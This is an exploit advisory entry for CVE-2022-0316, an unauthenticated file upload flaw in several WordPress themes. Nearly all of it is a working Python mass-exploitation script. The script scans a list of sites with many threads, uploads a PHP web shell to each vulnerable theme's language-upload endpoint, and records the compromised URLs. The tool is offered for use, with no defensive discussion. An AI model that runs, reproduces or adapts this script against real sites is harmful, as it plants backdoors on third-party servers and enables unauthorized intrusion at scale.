Wordpress Multiple themes - Unauthenticated Arbitrary File Upload

Risk: High
Local: No
Remote: Yes
CWE: CWE-434

Wordpress Multiple themes - Unauthenticated Arbitrary File Upload CVE-2022-0316 Unauthenticated Arbitrary File Upload in multiple themes from ChimpStudio and PixFill. Themes Effected: westand footysquare aidreform statfort club-theme kingclub-theme spikes spikes-black soundblast bolster rocky-theme bolster-theme theme-deejay snapture onelife churchlife soccer-theme faith-theme statfort-new Full code: https://github.com/KTN1990/CVE-2022-0316_wordpress_multiple_themes_exploit POC: ---------------------- #!/usr/bin/env python3 # -*- coding: utf-8 -* from argparse import ArgumentParser from random import getrandbits from concurrent.futures import ThreadPoolExecutor from threading import Lock from requests import Session __import__('warnings').simplefilter('ignore',Warning) class CVE_2022_0316: def Save(self, file, data): with self.Lock: with open(file, 'a') as f: f.write(f"{data}\n") def Exploit(self, url): name = f"{getrandbits(32)}.php" r = self.session.post(url, files={"mofile[]": (name, self.shell)}).text if "New Language Uploaded Successfully" in r: print(f" [ LOG ] (SHELL UPLOADED) {url}") self.Save("__shells__.txt", url.replace("include/lang_upload.php",f"languages/{name}")) return 1 print(f" [ LOG ] (SHELL NOT UPLOADED) {url}") def Scan(self, url): url = f"{'http://' if not url.lower().startswith(('http://', 'https://')) else ''}{url}{'/' if not url.endswith('/') else ''}" print(f" [ LOG ] (CHECKING) {url}") try: for path in self.paths: r = self.session.get(f"{url}wp-content/themes/{path}/include/lang_upload.php").text if 'Please select Mo file' in r: url = f"{url}wp-content/themes/{path}/include/lang_upload.php" print(f" [ LOG ] (VULN) {url}") self.Save("__vuln__.txt", url) return self.Exploit(url) print(f" [ LOG ] (NOT VULN) {url}") except: print(f" [LOG] EXCEPTION ERROR ({url})") def __init__(self, Lock): self.Lock = Lock self.paths= ["westand","footysquare","aidreform","statfort","club-theme", "kingclub-theme","spikes","spikes-black","soundblast", "bolster","rocky-theme","bolster-theme","theme-deejay", "snapture","onelife","churchlife","soccer-theme", "faith-theme","statfort-new"] self.shell= '''<?php error_reporting(0);echo("kill_the_net<form method='POST' enctype='multipart/form-data'><input type='file'name='f' /><input type='submit' value='up' /></form>");@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);echo("<a href=".$_FILES['f']['name'].">".$_FILES['f']['name']."</a>");?>''' self.session = Session() self.session.verify = False self.session.timeout = (20,40) self.session.allow_redirects = True self.session.max_redirects = 5 self.session.headers.update({"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36"}) if __name__ == '__main__': print(''' db d8b db d8888b. d88888b db db d8888b. 88 I8I 88 88 `8D 88' `8b d8' 88 `8D 88 I8I 88 88oodD' 88ooooo `8bd8' 88oodD' Y8 I8I 88 88~~~ 88~~~~~ .dPYb. 88~~~ `8b d8'8b d8' 88 88. .8P Y8. 88 `8b8' `8d8' 88 Y88888P YP YP 88 KTN ''') parser = ArgumentParser() parser.add_argument('-l', '--list', help="Path of list site", required=True) parser.add_argument('-t', '--threads', type=int, help="threads number", default=100) args = parser.parse_args() try: with open(args.list, 'r') as f: urls = list(set(f.read().splitlines())) ExpObj = CVE_2022_0316(Lock()) with ThreadPoolExecutor(max_workers=int(args.threads)) as pool: [pool.submit(ExpObj.Scan, url) for url in urls] except Exception as e: print(e) print(" [LOG] EXCEPTION ERROR @ MAIN FUNC")



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